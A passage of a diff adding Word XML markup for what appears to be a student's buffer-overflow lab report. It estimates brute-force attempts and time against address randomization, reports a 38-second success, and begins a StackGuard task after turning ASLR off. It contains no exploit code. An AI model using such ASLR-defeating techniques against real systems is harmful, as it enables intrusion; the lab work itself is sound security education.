+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:sSupPr>
+            <m:e>
+              <m:d>
+                <m:dPr>
+                  <m:ctrlPr>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                      <w:i/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                    </w:rPr>
+                  </m:ctrlPr>
+                </m:dPr>
+                <m:e>
+                  <m:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                    </w:rPr>
+                    <m:t>1-</m:t>
+                  </m:r>
+                  <m:sSub>
+                    <m:sSubPr>
+                      <m:ctrlPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                          <w:i/>
+                          <w:sz w:val="24"/>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                      </m:ctrlPr>
+                    </m:sSubPr>
+                    <m:e>
+                      <m:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                          <w:sz w:val="24"/>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <m:t>p</m:t>
+                      </m:r>
+                    </m:e>
+                    <m:sub>
+                      <m:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                          <w:sz w:val="24"/>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <m:t>0</m:t>
+                      </m:r>
+                    </m:sub>
+                  </m:sSub>
+                </m:e>
+              </m:d>
+            </m:e>
+            <m:sup>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>k</m:t>
+              </m:r>
+            </m:sup>
+          </m:sSup>
+          <m:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <m:t>≈k⋅</m:t>
+          </m:r>
+          <m:sSub>
+            <m:sSubPr>
+              <m:ctrlPr>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:i/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+              </m:ctrlPr>
+            </m:sSubPr>
+            <m:e>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>p</m:t>
+              </m:r>
+            </m:e>
+            <m:sub>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                </w:rPr>
+                <m:t>0</m:t>
+              </m:r>
+            </m:sub>
+          </m:sSub>
+        </m:oMath>
+      </m:oMathPara>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we can have the average </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>estimat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ion</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> table:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a7"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2254"/>
+        <w:gridCol w:w="1417"/>
+        <w:gridCol w:w="1417"/>
+        <w:gridCol w:w="1354"/>
+        <w:gridCol w:w="1355"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2254" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>robability</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1417" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>.2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1417" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>.5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1354" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>.8</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1355" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>.99</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2254" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>Number of attempts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1417" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>05k</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1417" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>62k</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1354" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>19k</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1355" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>19k</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2254" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>ime</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1417" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>9s</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1417" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>21s</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1354" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>54s</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1355" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>38s</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s it only took me 38s, the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>probability</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is 0.08587, so I am </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>really lucky</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.6 Task 5: Turn on the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>StackGuard</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Protection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Tu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>off</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the Ubuntu’s address randomization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4195457B" wp14:editId="18908B9B">
+            <wp:extent cx="5274310" cy="511175"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
+            <wp:docPr id="22" name="图片 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="511175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
